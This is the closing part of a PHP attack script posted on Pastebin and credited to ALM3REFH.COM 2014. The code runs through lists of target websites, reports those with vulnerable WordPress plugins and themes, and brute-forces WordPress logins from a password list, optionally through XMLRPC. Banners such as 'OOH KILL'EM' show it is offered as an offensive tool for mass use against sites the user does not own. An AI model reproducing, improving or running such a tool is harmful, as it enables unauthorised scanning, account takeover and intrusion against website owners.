        $r00t3rz = explode("\n", $targets);
696
        foreach($r00t3rz as $z){
697
            if(!$z == ""){
698
                xp_get_plugins($z);
699
                xp_get_themes($z);
700
            }
701
        }
702
        #################
703
        ##   Results   ##
704
        #################
705
        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
706
        $vulpl = file_get_contents('vulpl.txt');
707
        $getpl = explode("\n", $vulpl);
708
        #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
709
        foreach($getpl as $vul){
710
            if(!$vul==""){
711
                print "\n\t$vul";
712
            }
713
        }
714
        bye();
715
    } elseif($what == "3") {
716
        print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
717
        $list = trim(fgets(STDIN));
718
        if(!is_file($list)) {
719
            #######################
720
            ##  CAN'T LOAD LIST  ##
721
            #######################
722
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
723
            ##############
724
            ##   EXIT   ##
725
            ##############
726
            bye();
727
        }
728
        #################
729
        ##   POOYAA!   ##
730
        #################
731
        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
732
        $xmlrpc = strtolower(trim(fgets(STDIN)));
733
        if(in_array($xmlrpc, $yesno)){
734
            $xml = "set";
735
        }else{
736
            $xml = NULL;
737
        }
738
        print "\n[+] Bruting begun";
739
        $targets = file_get_contents('wp.txt');
740
        $xp = explode("\n", $targets);
741
        foreach($xp as $z){
742
            if(!$z == ""){
743
                xp_get_user($z, $list, $xml);
744
            }
745
        }
746
        bye();
747
    } else {
748
        ######################
749
        ##  OOH KILL'EM =P  ##
750
        ######################
751
        bye();
752
    }
753
}
754
#####################################
755
##  © ALM3REFH.COM 2014 - CHEERS!  ##
756
#####################################
757
?>
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!